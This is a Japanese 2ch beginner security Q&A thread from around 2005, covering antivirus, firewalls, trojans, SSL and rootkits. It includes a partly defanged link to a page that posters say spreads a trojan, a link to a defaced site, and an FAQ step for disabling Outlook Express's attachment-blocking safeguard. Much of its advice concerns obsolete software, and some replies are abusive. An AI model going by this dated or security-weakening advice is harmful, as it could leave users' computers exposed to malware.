セキュリティ初心者質問スレッドpart53

インターネットとパソコンのセキュリティ関係の初心者質問スレです。

★━ 質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━
　・ OSの種類（必須)、ブラウザ、セキュ関係ソフトの有無、やってみたこと等できる
　　 だけ詳しく報告。（例）「WinXPSP1,IE6SP1使用。ADSL回線でプロバイダは〜
　　 〜のルータを導入しているが、〜ができなくなった」等
　・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
　・ マルチポスト（他スレ、他サイトとの同時質問）禁止。他スレから誘導された場合は、
　　 その旨書くこと。
　・ 違法な話題や質問(WinMX、Winny、エミュレータ等)は禁止です。
　・ 薮パソユーザーは立ち入り禁止。HNを変えてもダメです。

《参考》
ウィルス情報＆質問　総合スレッド☆Part27
http://pc5.2ch.net/test/read.cgi/sec/1104587430/
・IEが乗っ取られて変になった↓
　　初心者板 http://pc5.2ch.net/pcqa/ に逝って「エロサイト」で検索
　　　関連サイト ttp://www13.plala.or.jp/sukiero/erostart/
・Windowsの動作がおかしい→ http://winfaq.jp/
・なんでもいいからとりあえず検索→Google http://www.google.co.jp/
・ページ内検索→ Win:[Ctrl]+[F](Mac:[コマンド]+[F])
・分類不明の質問→[ここらあたりで探してください] http://pc5.2ch.net/pcqa/
・２ちゃんねるの仕様の質問→ http://etc3.2ch.net/qa/
・2chスレッドタイトル検索→ http://gulab.ruitomo.com/~gulab/k.html

■Internet Explorer：つねに最新バージョンにアップデートしておく。（IE5.5sp2、
　6.0sp1以降推奨）
■安全なブラウザを利用する：
　Opera http://opera.livedoor.com/download/
　　Opera日本語ファイル http://my.opera.com/community/customize/langs/
　Firefox http://www.mozilla.org/products/firefox/
■怪しいメール：開かずに捨てる。IE5.01SP2,IE5.5SP2,IE6.0以上でなく
　Outlook Expressを使用している場合、メールをクリックしただけで感染する場合が
　あるので、プレビュー機能は必ずオフにしておく。
■アンチウィルス：常に最新パターン(ウィルス定義ファイル)に更新してないと意味なし
■不審なURL対策：
URLの文字列をよく見る。sex、loli、search、virusなどの文字列が入っていないか？
鑑定→ラウンジhttp://pc5.2ch.net/test/read.cgi/hack/1103768644/ へ。(初級ネットワーク板）
　その他「勇気」「鑑定」等のキーワードで鑑定スレを検索。
　初心者が誤ってクリックしないよう、ウィルスやブラクラへ直接リンクを張らないこと。
　リンク先を直接見る→「対象をファイルに保存」→メモ帳で一度開いてみる。
■アダルトサイト対策
　インターネットオプション→セキュリティ→インターネット→レベルのカスタマイズ
　→ ActiveX、JAVA、スクリプトを全て無効
　ブラウザハイジャッカーの99%はIE以外では作動しない。IEの部品を利用しないOperaや
　Firefoxを利用するとトラブルを防げる。
■最近はウィルス以外にブラウザを乗っ取って個人情報を盗んだり、エロサイトに飛ばし
　 たりするスパイやハイジャッカーが流行している。アンチウィルスソフトだけでは防げ
　 ないのでアンチスパイソフトも入れておく。参考 ttp://www13.plala.or.jp/sukiero/erostart/

【OE(=Outlook Express)】
・OEのプレビューをオフ
　[表示]-[レイアウト]-「プレビューウィンドウを表示する」
　のチェックを外す。

・OE6で添付ファイルが開けない
　「添付ファイルは安全でないため……」と表示される。
　 [ツール]-[オプション]-[セキュリティ]タブ-「ウイルスの
　可能性がある添付ファイルを保存したり開いたりしない」
　のチェックを外す。

・OE以外のメーラーならウィルスメールを開いても安全か？
　IEコンポーネントを利用してHTMLメールを表示する場合はご用心。

　→[おすすめのメールソフトは何？]スレ参照
　http://pc5.2ch.net/test/read.cgi/software/1101659990/


　OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法
　http://pc5.2ch.net/test/read.cgi/sec/1021363841/

　IE6SP1適用済みOE6ならHTMLメールをテキスト形式表示可能
　http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021007/1/
　http://www.ipa.go.jp/security/txt/2002_10.html

【IPアドレス】
・自分のIPアドレスを確認
　9x系：[ファイル名をしてして実行]→winipcfg.exeを実行。
　NT系：コマンドプロント起動→ipconfig /allを実行。

・他人のIPアドレスを確認
　MS-DOSプロンプト(コマンドプロンプト)を起動して、
　netstat -anを実行。表示されたポートから判断。

・IPアドレスから個人情報は漏れるか？
　プロバイダが所有する情報は公権力が無い限り、外部漏洩は
　通常なし。それよりもクラッキング対策をするべき。

・IPアドレスからプロバイダを知りたい
　>>6-10の【Whois】参照。なお、結果を貼りつけても無視される。

【掲示板】
・掲示板荒らし対策
　注意、警告、放置、削除、一時閉鎖、利用制限、通告、完全閉鎖。
　冷静に判断し、対応。困っているのは貴方だけではない。

・掲示板利用者のIPアドレスは調べられるか？
　HTMLソースに書いてある場合もある。

【各種 Firewall】
ZoneAlarm (本家) http://www.zonelabs.com/ (日本) http://jp.zonelabs.com/
Kerio Technologies Inc. | Kerio Personal Firewall
http://www.kerio.com/kpf_home.html
Tiny Personal Firewall http://www.tinysoftware.com/home/tiny2?la=JP
Agnitum Outpost http://www.agnitum.com/download/outpost1.html
Sygate Personal Firewall http://www.sygate.com/
AtGuard http://www.atguard.com/
BlackICE Defender http://blackice.jp/
Snort for Win32 http://www.datanerds.net/~mike/snort.html
【ログ解析ツール】
ICEWatch http://www.angelfire.com/falcon/icewatch2000/
ZoneLog Analyser http://zonelog.co.uk/
TPF Log Analyzer （Tiny Personal Firewall用）
http://server47.hypermart.net/tinyfirewall/ (リンク切れ)

【スパイソフト発見ソフト】
Ad-aware http://www.lavasoft.nu/support/download/
Spybot http://security.kolla.de/
【フリー版、体験版、日本語パッチ 等】
ZoneAlarm英語フリー版、Pro http://www.zonelabs.com/store/content/company/products/trial_zaFamily/trial_zaFamily.jsp
フリー版→「ZoneAlarm Free Download」、Pro→「ZoneAlarm Pro」
ZoneAlarm日本語フリー版 http://jp.zonelabs.com/download/znalm.html
ZoneAlarm日本語Pro評価版 http://jp.zonelabs.com/products/zapTrial.html
Tiny Personal Firewall 日本語化パッチ
http://www.geocities.co.jp/SiliconValley-Cupertino/2943/

【セキュリティ チェックサイト】
Shields UP ! https://grc.com/x/ne.dll?bh0bkyd2
Shields UP ! の日本語解説サイト http://www.upsizing.co.jp/news/report0426.htm (リンク切れ)
Symantec Security Check
http://security.symantec.com/default.asp
Secure Design - Port Scan Security Check
http://www.sdesign.com/securitytest/
セキュリティチェックサイトのリンク集
http://www.toyo.co.jp/security/ice/advice/Support/KB/q000026/default.htm
【Whois】
APNIC http://www.apnic.net/
JPNIC Whois Gateway http://whois.nic.ad.jp/cgi-bin/whois_gw
IPドメインSEARCH MSE株式会社 http://www.mse.co.jp/ip_domain/index.shtml
【解説サイト】
Firewall 解説サイト Fire & Forest http://eazyfox.homelinux.org/
Snort 解説サイト http://www.port139.co.jp/ntsec_snort.htm

[ウィルス情報]
IPAセキュリティセンターhttp://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response http://www.symantec.com/region/jp/sarcj/
Trend Micro ウイルス情報 http://www.trendmicro.co.jp/vinfo/
McAfee ウイルス検索 http://www.nai.com/japan/security/vlibrary.asp

[Windows板] 広告カットとファイヤーウォールソフト。
http://yasai.2ch.net/win/kako/971/971411733.html
[パソコン一般板]
自分のパソコンへの不正侵入対策してますか？2
http://salad.2ch.net/pc/kako/980/980600110.html
[初級ネット板] 簡易ファイアーオール
http://mentai.2ch.net/hack/kako/972/972826108.html

パソコン初心者＠2ch掲示板 http://pc5.2ch.net/pcqa/
初級ネットワーク＠2ch掲示板 http://pc5.2ch.net/hack/
windows＠2ch掲示板 http://pc5.2ch.net/win/
ソフトウェア http://pc5.2ch.net/software/
ダウンロードソフト(download板) http://tmp4.2ch.net/download/
パソコン一般＠2ch掲示板 http://pc5.2ch.net/pc/

「森で遊ぼう」
(ファイヤーウォール等セキュリティ関係解説サイトダウンロードページのリンク 日本語解説ページあり)
http://eazyfox.homelinux.org/

・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)は危ないと感じた人達へ
ネスケ（ネットスケープコミュニケータ）やOpera（オペラ）を使用するという手段があることも念頭にいれてお いてください
http://wp.netscape.com/ja/
http://opera.livedoor.com/

・無料で使えるアンチウイルスソフト
　AVG http://pc5.2ch.net/test/read.cgi/sec/1106661867/
　BitDefender Free Edition http://pc5.2ch.net/test/read.cgi/sec/1103213501/
他AntiVir
・ソフトがなければ、オンラインウィルススキャン
　http://www.symantec.com/region/jp/securitycheck/index.html
　http://www.trendmicro.co.jp/hcall/index.asp
(※署名済みActiveXコントロールのダウンロードを有効にすること)

・ウィルス対策ソフトの用語
　「駆除」：ファイルからウィルスを取り除くこと。
　「隔離、検疫」：ファイルをリネーム、移動。実行できなくする。
　「削除」：ファイル自体を削除。ワーム本体は通常、削除される。
・デマウィルス（安全なファイルをウィルスだと言い張る偽情報）
　jdbgmgr.exe、sage.exeなどは全てWindowsのシステムファイル。
　http://www.ipa.go.jp/security/topics/alert140515.html参照。
・webメール：添付ファイルを実行した場合、感染確率大。
　hotmail：ウィルス検査はあるが、新種のウィルス相手には無力。
・MacはWindowsのウィルスに感染するか？
　WindowsのアプリケーションはMacでは通常は実行できないので、
　感染はしない。但し、保菌してMac→Winへ感染する例がある。
・ファイアーウォールがトロイのアクセスをブロックしたが…
　アウトバウンドで検出：感染の可能性高。
　インバウンドで検出：感染の可能性低。念のためにチェック。
　※たまたまバックドアツールが通常使うポートと同じ場合もある。

>>1
乙彼

>>1
Ｚ

>>10
連続投稿ｺﾞﾙｧで困ってたトコだった・・・ﾏｼﾞ助かったよーｗ　クスコ!!


http大杉とｺﾞﾙｧされたから途中分割してみた。
過去ログも同じでｺﾞﾙｧされた・・・必要かなぁ？
そして8レスで「連続投稿でつか？」とｺﾞﾙｧ　orz

デッドリンクあったら修正願う

スレ違いだけど、すごいもの見つけたｗこれってハッキングだよね

下のurlに行って、「英語（公式サイト）をクリックしてみ。ブラクラじゃないみたいだけど、ハッキングした旨の事
がワカラン言葉で書いてある。
(yukopiano.com日本語サイト）
ttp://www.tcp-ip.or.jp/~lorna/Japanese/global.html


実際のＵＲＬ入り口
ttp://www.yukopiano.com


ハッキングを間近でみれて、まじでびびったよ。

怖くて踏めない……

>13
うわ、初めてみた！！！

【Whois】できる、新しいところ見つけた。
サイトチェック http://sitecheck.jp/

>>13

これはこれは・・・。
ページ全体光るのって、ポケモンでもそういう事故あったよな。
ノートンは反応してないので無問題だろ

>13
こわー……。
誰か翻訳できる人いる？

>>17
JavaScript切ってから見ろ。
サイトの改ざん情報はttps://www.netsecurity.ne.jp/9.htmlに行けば見られる。

>>13
スレ違いの上にマルチかよ。厨房は(・∀・)ｶｴﾚ!
http://pc5.2ch.net/test/read.cgi/sec/1027870017/667

>>13
リアルで見たの初めて。
おそらく南米のどこかの言葉じゃないかな？

厨房の自演はやめろｗ

誰か13を実況汁

ここは質問スレなんで、
ハッキングされたら報告するスレhttp://pc5.2ch.net/test/read.cgi/sec/1027870017/l50
でやれ
--------------------------------FireWall--------------------------------

↓誰かこの動画をURLクリックしただけでで見れるようにうｐできる人いませんか？できる人いたらお願いします。
http://www.dela-grante.net/michelin/up/so/No_2965.lzh

>>25
板違い。セキュリティに関係ない。厨房はこの板に来るな。

すいません、初めまして。ノートンをケチって２００３年から
更新してなかったら、昨夜ウイルスが見つかった！とお知らせを受け
見てみたら、VBS.Reblof.Aって書いてありました　TOT
そのあとにウイルス定義を最新のものにして、スキャンを行いましたが
感染、修復はゼロと出ました。
なので一応まだ悪さはしていないみたいなのですが
ノートンの取り除き方を見ても全然やり方が判りません　orz
なんとかお金をかけずに、治したいのですが
PCにうとい、素人の自分じゃ無理ですか？
なにかアドバイスありましたら、宜しくお願い致します＾＾；
明日またここに訪れます。。

>>27

手動での駆除j方法はそれほど難しいとは思えないのですが。

以下のサイトは検索、駆除も可能だとうたっています。
自己責任でお試しになってみては？
ＩＥ必須です。
ttp://www.bitdefender.com/scan/license.php

他にも
avast! 4.6 というフリーのウィルス検知駆除ツールがありますのでダウンロードして
一時的にインストールしてみて、駆除されてはいかがでしょう。
うまくいくかどうかは分かりませんが。

avast! 4のスレッド
http://pc5.2ch.net/test/read.cgi/sec/1110113376/

もしも英語にアレルギーがなければAVG Anti-Virusというツールもありますが。
こちらは日本語では使えませんので･･･。

すいません。質問致します。
専用ブラウザで、スレタイ見ているだけでノートンが作動しました。
どうもスレタイにウイルスコードが貼り付けられていたようです。
それで、スキャンしても感染していると表示されたのですが・・。
これは危険なんでしょうか？心配です。

>29
「ノートンに誤反応してしまう文字列」の羅列にすぎないので、心配ありませんよ。

>>27
すいません。ノートンのアンインストール方法でしたね。
ボケてました。
残念ながらノートンはインストール経験がないので私には分かりません。

他の回答してくださる方にとってもお使いのパソコンのＯＳなどの情報
を追記した方が分かりやすいかと思います。

　 ∧＿∧ 　+
　（0゜・∀・）　　　ワクワク 　　
　（0゜∪ ∪ +　　　テカテカ
　と＿_）__）　+

>>27
安心は金で買うものだよ。
金使うのが嫌なら勉強しなさい。

VB2004の事なんですけどIntervalのdword値を00000708にするとGUIのマスの中の表記は708になるのでしょうか？
どうか教えて下さい。

ヤダ

　 ∧＿∧ 　+
　（0゜・∀・）　　　ワクワク 　　
　（0゜∪ ∪ +　　　テカテカ
　と＿_）__）　+ 　　　正座正座

無線LANのスレッドが使い物にならないようなので、こちらで質問させてください。
先日coregaの無線LANを購入したのですが、デフォルトでは暗号化されていませんでした。
WEPキーを入力する項目はありましたが、そもそもWEPキーが何かわかりません。
ルータについていた製品番号でよいのでしょうか？

>>37
それでいいですよ。

あぼーん

サーズ国家や赤のキムチが必死にルーター目掛けアタックしてきてる最中に
此方で打ち込んだ情報（ユーザー登録やクレジット番号）とか見えてるの？

>>40
場合によるので何ともいえません。

>>40
すでに中に入られてれば

Bloodhound.Exploit.6というウイルスが発見されたんですが、
どうすればいいでしょうか？

ノー�d先生は削除できないそうです

>>43
2chブラウザのログファイルじゃないの？
もしそうなら放っておけばOK

>>44
Opera関連から見つかったのですが・・・
Operaでもそうなんですか？

あと、警告を消すにはどうしたらいいんでしょう？

>>40-41
中に入られてる気配とかわからないです。
ん〜気にしなくてよいのかな？

訂正
>>41-42です

本体見つけた

global.datっていうファイル名なんですけど、
削除しちゃっていいもんですか？

>>48
履歴ファイルだから消してもいいんじゃないの

何も症状ないのに、スパイウェアに感染してる場合ってありますか？

あと、ウィルスバスターを買おうか迷ってるんだけど、
やっぱり買ったほうがいいですか？
買う場合、お店？それともサーバーで申し込んだほうがいい？

質問ばかりですいませんがお願いします！！

>>49
これただの履歴ファイルなのか・・・
おｋ、丁寧な回答ありがとうございます

>>50
ありありです
初Spybotのときは１０個くらい取れた。。

>>50
こっそり入ってるから”スパイ”と言われるんですが・・・
ウィルスバスターは買え。今すぐ買え。
Ｗｅｂから買えば安い。中身は一緒。
よく分からないなら店に行って店員に聞け。

まじですか・・・・。
やっぱ申しこもう。
どこが一番いいですか？

サーバー管理で月額ってのがあるんですけど、
それでもいいかな？

>>54
お金なんて払うのはバカらしいから、
無料のにしなよ。avastやＡＶＧなんか無料で
機能も市販品に劣ってないよ。

>>54
見え透いたネタ

警告がウザいんですが、消す方法見たいのあるんでしょうか？

初心者なんで・・・。
無料のとかどこにあるのか教えてもらえませんか？

>>58
少しは自分で探せ
http://www.google.co.jp/

>>58
初心者が２ちゃんなんかで質問するんじゃない。
ネタにされるよ。
>>59なんて良心的な回答だよ
ﾏｼﾞで

age

アダルトサイトに飛ばされ　
お気にに見知らぬサイトが登録されアダルト系
カジノインストールがアップされ
メディアプレーアー見ると
英語版のセキュリティー警告ダイアログボックス開く
これって
今流行のスパイ

>>62
http://life7.2ch.net/yume/へ

>>62
流行などしていない
おまえが半年遅れでセキュリティホール

すいません。質問させてください。
tp://forum.onecenter.com/cgi-bin/forum/forum.cgi?c=msg?fid=petjka&mid=3357
っていうリンク踏んでしまいました。
その後のレスでトロイっていうウィルスらしいのですがどうすればいいですか？
インストールの配布画面？が出てきていいえを選び、一度電源を落としたのですが、ＩＥが起動しません。
WINXPでIE６SP２使用です。ISDN回線でプロバイダはOCNです。
ノートンで検索しましたが、発見されませんでした。
ノートンは2003年8月から更新してません。
回答よろしくおねがいします。

>>65
ノート〆更新しなさい

>>66
更新しようとしてもIEにつながらないので、ノートンの更新ができない状態です。

ＸＰ、ＩＥ６、ウイルスバスター（初期設定のまま）有りです。
ネットショッピングなんですけど、ＳＳＬを使用していない
注文フォームから注文して大丈夫でしょうか？

ショップ自体は実在も確認してますし、大丈夫なんです。
（たぶん、ＳＳＬ等の知識が無いような個人の店だろうと思う）
記入する個人情報は氏名・住所・電話番号のみで、クレジットカードは
使用しないので記入しません。
メールでも注文できますが、電話・ＦＡＸは避けて欲しい
という事なので（怪しい理由ではなく、仕事時間のため）、
注文フォームかメールから注文したいのですが・・・

ＳＳＬを使用していないと、そんなに危険なものなんでしょうか？

危険じゃないならSSLなんか要らない

>>68
http://www.google.co.jp/search?hl=ja&q=%EF%BC%B3%EF%BC%B3%EF%BC%AC&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=

ﾁﾐはｱﾎﾟですか？

>>67
何かあってからアンチウィルスソフトを更新したのでは遅い。
つーか、OSクリーンインストールして次からはアンチウィルスきちんと更新しとけよ。
殺されてから警察呼んでも死人が生き返るわけではない。

>>68
途中経路で氏名・住所・電話番号盗み見し放題の可能性。あくまでも可能性。

>>68
SSLを使っていないと、回線上で盗聴しているやつがいると、
素のデータだから読み取られてしまう
カード情報を入力しなければ特にヤバイ事もないとは思うが？
個人の判断でどうぞ！

いろいろありがとうございます。
もう少し質問させてください。

１．ＳＳＬを”使用した”ショップで注文しても
　　注文の確認の「メール」に、送信した住所や氏名や電話番号が
　　書かれてくるけど、実はアレも危険だったりしますか？

２．ＳＳＬ無し注文フォームと、メール注文
　　どちらがまだマシですか？
　　また、どうしても購入したい場合、みなさんならどちらを選ばれますか？

>>73
メールは暗号化されていません。
気にするようならネット通販はやめるべきかと。
ネット店舗でも電話で注文できるだろうけど。

アンケートは禁止

注意！通信ログを狙う詐欺！
http://society3.2ch.net/test/read.cgi/soc/1108876775/

>>74
ＳＳＬありのショップでも、確認メールは来ますし、
メールは安全なのかと思ってました。

って事は、ＳＳＬ無し注文フォームもメールも危険度は
一緒かと思えてきたので、注文する事にしました。
カード情報入れませんし、まぁいいかという事で。

>>71
ありがとうございます。
では、もう一度ＯＳインストールすればいいんですね？

>>76
そんなことよりも注文する店の信頼度の方がはるかに重要。

>>77
ＨＤＤをフォーマットしてからな。

>>76
まあ、いくらネットで気を付けていたって、実生活でストーカーに付回されて
行動を逐一監視されていたらプライバシーも何もあったもんじゃないって事だ。
その情報を利用して身の回りの人間を使って嫌がらせされたら誰だってたまったもんじゃない。
こんな事を企業単位でやるところもあるらしいから、嫌な世の中だよね。

>>79
ありがとうございました。やってみまあす。

>>76
メールだとメールサーバーに保存されてる期間があるから、
SSLなしフォームのほうが危険度は低いと思うよ。

Norton Internet Security　2005の体験版というのをダウンロードしようと
思っているのですが、それの試用期間が１５日ということらしいのです。

お聞きしたいのですが、１５日以降ではその効力は皆無なのでしょうか？
きっかり１５日後に消失してしまうものなのでしょうか？

いろいろありがとうございました。
まぁ、気を付けて、でも考えすぎずにネットショップを
利用していこうと思います。
８２さんのご意見も大変参考になります。
他のみなさんもありがとうございました。

ソースネクストのウィルスセキュリティ入れたら
勝手に接続遮断します。
どうすればいいでしょう？
環境はピッチです。

やっぱMOD32だろ

暗号化するときのWPA-PSK(事前共有キー)って、何を入力すれば良いんですか？

83
落とせば分かる

Nortonの企業向けウィルス集中管理のやつって
説明書見ながらやれば初めてでもセットアップ・運用可能ですかね？

通常のウィルスソフトインスト設定ができる
ＦＷソフトで特定のポートの開け閉め設定ができる
ＩＰアドレス、メール、ネット接続の設定ができる

サーバーＯＳインスト・構築経験なし

こんなレベルです・・・

>>89
初心者スレに書いてる時点で、不安が・・・。
業者に頼んで保守契約結んどけば、あとあと楽だと思いますよ。

>>89
設定サービスがあるから、金払って設定してもらいなよ。
片手間ではとてもじゃないけど、仕事にならないよ。

「セキュリティに疎い奴」と「セキュリティ初心者」は違う

mcafeeを使ってるんですけど、
使う前とでは、ZiPをデスクトップに保存した時の表示が違うのですがなぜですか？
教えてください。

>>93
表示ってアイコンのこと？

>>90
そうなんです、不安が・・・
>>91
サーバーのインスト・ＡＤ設定は業者がやってくれるので
作業は集中ウィルス管理ソフトのインスト・設定だけなんです
ちなみに、片手間ではなくこの作業メインに時間がしばらく
取れるんです・・・

>>95
セキュリティを素人がやっても何の意味もない。プロに頼みなさい。
それとも、ウィルスが発生して、それがあなたの定義ミスだとして責任取れるんですか？

ＳＯＨＯレベルの小事務所を設定して回ってるんですが、インストールを失敗してるのに
そのままほったらかし。パターンが更新されてないのにしらんぷり。
それでウィルスに感染したから責任取れ！なんてゴネまくるやつが多くて多くて、ほんと、死にそうです。

>>95
具体的な質問が浮かぶまで回線切って取説見てろ

>>96
DQN客相手、乙です。死なない程度にｶﾞﾝｶﾞﾚ！

>>98
一番腹がたったのは、今時ブラスターにやられまくったのを
オレのせいにしたＤＱＮ○上！てめー！ゆるさねぇ！
あれほどＬＡＮから全部切断しろって電話しただろうが！クズが！
２００台のうち、１０台だけでウイルスチェックすればいいって
頭どうかしてんじゃねーのか？賠償請求できるもんならしてみろ！

あー、バカばっかしのドキューンスレ
ヘルプでも１月かけて読みやがれ
どう言った事をしてくれるかがわかったら、設定でもしやがれ

>>99
∧＿∧ 
( ´･ω･) まぁ茶でも飲んでもちつけ。 
( つ旦O 
と＿)＿) 　旦

Meを使っているのですが、去年の暮れにyahooのノートン（月500円の）を入れたら、
重くなって全然動きませんでした。
今度ウイルスバスターを買って入れてみようと思っているのですが、
やっぱり重くなってしまいますか？

>>102
その前にﾊﾟｿ買うか作るかしたら
５ﾏｿもあれば新品でそこそこ動くの買えるはず。
ノートも新品８ﾏｿの時代だし

ｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗしねｗｗｗｗｗｗｗｗｗｗｗｗ
ｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

>>103
貰い物なんだけど、やっぱ古いと色々ダメですか…
5万のなんて売ってるの見た時ないど！！
ノートってファイヤーウォール平気なんですか？

>>105
使えるかどうかは本人次第
パソコンの値段は
http://www.kakaku.com/pc/
ここで調べてくれ
ファイアーウォール云々は論外。
買ってからノートン入れてください。
多分それが一番ハッピーだ。

>>106
直リンしてもた。
価格.COMさん許してね。
ttp://www.kakaku.com/pc/

ギコナビで２ｃｈ開こうとしたら
ノートンが反応して開けないんですがどうすればいいでしょうか？
ＩＥからだと普通に開けます。ちなみに板はモー娘。（狼）です

>>108
2chのログフォルダを除外に設定

>>109
どのようにすれば除外に設定できるのでしょうか？
質問ばかりですいません

教えてチャン大杉

inktomisearch.comからのアクセスを拒否するにはどうすればよいのでしょうか？

最近セキュリティ板が初級ネット板化している件

質問する人は>>1を読みましょう。

検索して分かるようなことや、製品のヘルプやマニュアルで解決するようなことは、
聞いても誰も答えません。
「セキュリティ初心者」であって、「PC初心者」ではないので注意。

聞きたいんだけどF-Secureってどう？
http://headlines.yahoo.co.jp/hl?a=20050310-00000008-bcn-sci
使った人いたら聞かせて
http://www.f-secure.com/blacklight/
osのカーネルとかいじるrootkitってvirusのじゃ駄目なんだね・・

inktomisearch.comからのアクセスを拒否するにはどうすればよいのでしょうか？

>>117
>>114

>>110
ギコナビの事はギコナビスレで

２ちゃんねる用ブラウザ「ギコナビ」 Part28
http://pc5.2ch.net/test/read.cgi/software/1106235429/

>>117
inktomisearch.comでぐぐったら一発目で答えっぽいが

つーか板違いだろ。
>>112>>117
web制作管理＠2ch掲示板http://pc5.2ch.net/hp/

汚染を除去しました。

>>122
これって感染するんですか？

>>123
ノートンがvbsウィルスのソースに誤反応２
http://pc5.2ch.net/test/read.cgi/pcqa/1033948204/
ノートンがvbsウィルスのソースに誤反応３
http://pc5.2ch.net/test/read.cgi/pcqa/1109609938/
>122のLOVE-LETTERに関してここでは以後質問禁止な。

やはり定期的な再インストールが必要なのか？
MS研究者、「カーネルrootkits」の脅威を警告
http://www.itmedia.co.jp/enterprise/articles/0502/18/news027.html

>>125
MSはシステム中核部分をROM化することを検討してるらしいね。
今では５００円あればWidowsを格納するROMも作成可能だからね。

生IPで書き込もうとしたら、プロキシ規制で書き込めないでやんの
普通逆だろうよ？
ビッグローブです

>>126
同じハードでLinuxも使えるなら大歓迎

つーかCD-ROMでブートできるKnoppixあるじゃん。

パソコンを使っていると突然IEが起動して、ブラクラを踏んだときみたいに無限にIEが開くのですが・・・
本当に突然なるのでわけがわからず困っています

OSはWINDOWS2000で、アップデートはすべておこなってあります。
SpybotとAVGでチェックしてみましたが、何も検出されませんでした。
ファイアウォールはありません。
よろしくお願いします。

>>130
何かFW入れて監視してみたら？
無料のがいぱーいあるから、この板で探してみて。

>>130
トロイが入っていてウェブサーバーにアクセスしているから
エロ助スレでも参考にすれば？

自分もＩＥについての質問なんですが、
ネットスケープでは設定できるのに（動作もできています）
ＩＥではプロキシ設定ができません。
ちなみに、ブラウザは「マック用、5.2日本語版」です。

具体的に言うと、設定するところが表示されてるのですが、
プロキシサーバとポートなどの書き込みができないのです。
secureプロキシとかメールプロキシのところはインプット可能
なのですが、webプロキシのところが閉じたままなんです。

>>133
Mac板の方が回答もらいやすいよ。
それにネットワークセキュリティと関係ないし。

NegiesというのでTCPコネクションを見てたのですが
中国系のIPアドレスからexplore.exeプロセスに繋げようとしてるみたいです。
(状態にSYN_SENTと出る)
一応、FWで中国IPを全部弾いてるのですが、他に何かしないと危険ですか？

>>135
入れなおした方がいい。しかも緊急に。

わかりました。入れなおします！

リアルタイムだよな。日本人はとにかくNEGiESいれろと、国が推奨すべきだ。

>>138
おまえ、Negiesについてこの板を１００ペン回ってから同じこと言えるかやってみろ。

>>131-132
ありがとうございます。トレンドマイクロのオンラインスキャンもスルーされたので、Kerioってやつを入れてみます。

>>139
は？何でだ。その理由を言え。
馬鹿はお前のほうだろ。はやく気づけよ。

>>140
ムダ。一旦感染すると既存のチェックツールでは検出できない。
ttp://www.itmedia.co.jp/enterprise/articles/0502/18/news027.html　　←ここみれ。

＞カーネルrootkitsは感染したマシン上で密かに動作し、
＞現行のセキュリティ製品ではほとんど検出不可能、　　　　←
＞中には暗号化まで利用するものもある。（IDG）

感染してしまえば、ノートンだろうがマカフィーだろうがトレンドマイクロだろうが
検出は不能。だから、普段からActivXやらJavascriptやらについてキチっと
ガードできるＦＷソフトを入れて防備してなければムダ。もう入れなおすしかない。

>>140
知らない奴がKerioなんか入れると泣きをみるよ
軽くてインターフェースカッコいいけどな。
zoneあたりにして後日Kerioにしたほうがいいと思うが

>>143
ネットワーク初心者なら
zone＞outpost＞kerio　の順がいいと思われ

あ、重要なことを聞くのを忘れてました。
入れなおした後はどのような対策をしておくべきですか？
ウイルス検索にもスパイウェアにもひっかからなかったので。

>>145
ＩＥなどは高で使ってください。
不明なＨＰは見ないようにしましょう。
ＦＷソフトをつねに入れておいてください。

>>144
outpostは厄介なバグ抱えてるけどね。
日本語はダメダメとか聞いたが

>>146
了解しました！
では、バックアップ作業に戻ります。

Kerioもう入れてしまったんですが・・・
再起動してすべてをaskにして放置したら早速超アヤシイ奴が見つかりました
Microsoft File and Printer Sharing

Kerioがブロックしてくれました。 こんなの入れていません。
でもフルパス見てもbiosとしか表示されませんのでどうしたらいいのかわかりません。
いつか再インストールするまでブロックし続けるしかなさそうです・・・
これがrootkitsってやつなんでしょうか？

>>149
ネタ乙
初心者がkerio入れて２ちゃん見られるか？

ＰＣの扱いはそこそこ達者なんですが、
ネットワークはちんぷんかんぷんなんですよ・・・

>>142
紹介いただいたページを読みましたが、ROOTKITというのは潜伏してデータを盗むのが目的と受け取りました。
このようなバカげた動作で存在をアピールするのは違うような気がします。
そこのページで紹介されていたBLACKLIGHTという検出ソフトが丁度いまさっき公開されたので使ってみましたが、検出されませんてした。
よかった・・・いや状況はまったくよくないのですが・・・

>>130
今すぐケーブル抜いて入れ直せや話しはそれからだ









終わるまで書き込むなよ

＞BLACKLIGHT
他のアンチウィルスと一緒に使っても大丈夫？

>>154
おいおいおいおいおい。何をいれてんだよオマエ。

>>155
何入れてるって？
アンチウィルスソフト

初心者質問スレで
rootkitがどうのこうの言ってる香具師は
根性悪

トロイっていうのを踏んだ見たいなんですが、これからどう対処していいかわかりません。
まず何をしたらいいですか？

>>158
パソコンを再インストールしてください。

【質問】
今、サブマシンには、OSをWindowsNT4.0ワークステーションを入れて使用しています。
今まではそれに、ウィルス対策ソフト&ファイヤーウォールソフトとして、
ノートンインターネットセキュリティ2002を入れて使ってきました。
ただ、近いうちにこの2002のサポート(正確にはウィルス定義ファイル配布の対応が)打ち切られてしまうみたいなのです。
なので、セキュリティソフトの乗り換えをしなければならないと思っています。

そこで、WindowsNT4.0ワークステーションに対応しているセキュリティソフトで、おすすめを教えていただけませんでしょうか？
ウィルス対策ソフト、ファイヤーウォールソフト、それぞれ教えていただけますと幸いです。
よろしくお願いします。m(_ _)m

>>158
次こそ
ファイアウォールソフト(ZONEなど)
スパイウェアソフト(spybot spywareblastar IE-SPYAD ADawareSEなど)
レジストリ保護
クッキー監視ツール
など導入しようと決意する。

ＩＥ使うのやめようかな。と検討してみる。

どのTROJANかも説明しない貴方のために時間を割くのは面倒だし、
貴方にとっても再インスコしたほうが多分早いし安全確実。

つづき↓

ホントはアップグレードをしてでもノートンインターネットセキュリティが使えれば一番良かったのですが、
2003以降のバージョンはウィンドウズNT4.0には対応していないみたいなのです。
フリーウェアやシェアウェアみたいなのでも構いませんので、どうかご教授いただけますと幸いです。m(_ _)m

nod32

うぉ！
